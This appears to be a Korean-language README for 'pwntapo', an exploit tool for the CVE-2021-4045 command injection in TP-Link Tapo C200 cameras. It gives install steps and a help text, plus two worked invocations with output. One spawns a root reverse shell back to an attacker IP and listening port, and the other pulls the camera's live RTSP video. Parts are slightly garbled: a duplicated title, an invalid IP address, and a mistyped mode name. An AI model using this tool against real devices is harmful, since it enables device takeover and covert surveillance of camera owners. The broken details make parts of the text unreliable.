
🔐 "PWNTAPO: TP-Link Tapo C200 카메라(<= v1.1.16 Build 211209)의 명령 삽입 공개" 🔓
🔐 "PWNTAPO: TP-Link Tapo C200 카메라 (<= v1.1.16 Build 211209)의 명령 인젝션 공개" 🔓
익스플로잇에 대한 내용은 exploit db에서 확인하세요.
이 취약점은 모든 TP-Link Tapo c200 카메라 펌웨어 버전 < 1.1.16 Build 211209 Rel. 37726N에 영향을 미치는 명령 인젝션 취약점입니다. 익스플로잇 작동 방식에 대해 더 알아보려면 hacefresko의 글을 읽어보세요.
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h
python3 pwntapo.py -h
============================================================================================
@Pl4inT3XT
_______ ________ ___ ___ ___ __ _ _ ___ _ _ _____
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | | || | / _ \| || | | ____|
| | \ \ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__
| | \ \/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|___ \
| |____ \ / | |____ / /_| |_| / /_ | | | | | |_| | | | ___) |
\_____| \/ |______| |____|\___/____||_| |_| \___/ |_| |____/
============================================================================================
usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]
PWNTAPO: TP-Link Tapo C200 카메라 (<= v1.1.16 Build 211209)의 명령 인젝션 공개
options:
-h, --help 도움말 메시지를 표시하고 종료합니다.
-M M 공격 모드 : shell | rtsp (기본값: None)
-U U RTSP_USER (기본값: None)
-P P RTSP_PASSWORD (기본값: None)
-C C RTSP_CIPHERTEXT (기본값: None)
-H H 대상 IP 주소 (기본값: None)
-A A 공격자 IP 주소 (기본값: None)
-p P 리스닝 포트 (기본값: None)
-v 출력 상세도 증가 (기본값: False)
익스플로잇은 SHELL과 RSTP 두 가지 모드가 있습니다.
쉘 모드에서는 대상 IP, 공격자 IP 및 리스닝 포트만 제공하면 장치에서 루트 쉘이 생성됩니다.
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887
============================================================================================
@Pl4inT3XT
_______ ________ ___ ___ ___ __ _ _ ___ _ _ _____
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | | || | / _ \| || | | ____|
| | \ \ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__
| | \ \/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|___ \
| |____ \ / | |____ / /_| |_| / /_ | | | | | |_| | | | ___) |
\_____| \/ |______| |____|\___/____||_| |_| \___/ |_| |____/
============================================================================================
[+] Listening on port 1887...
[+] Sending reverse shell to 192.168.110.121...
Listening on 0.0.0.0 1887
RSTP 모드에서는 RSTP_USER, PASSWORD 및 CIPHERTEXT를 제공하여 카메라의 실시간 영상을 얻을 수 있습니다.
python3 pwntapo.py -M shelrstp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=
============================================================================================
@Pl4inT3XT
_______ ________ ___ ___ ___ __ _ _ ___ _ _ _____
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | | || | / _ \| || | | ____|
| | \ \ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__
| | \ \/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|___ \
| |____ \ / | |____ / /_| |_| / /_ | | | | | |_| | | | ___) |
\_____| \/ |______| |____|\___/____||_| |_| \___/ |_| |____/
============================================================================================
[+] Setting up RTSP video stream...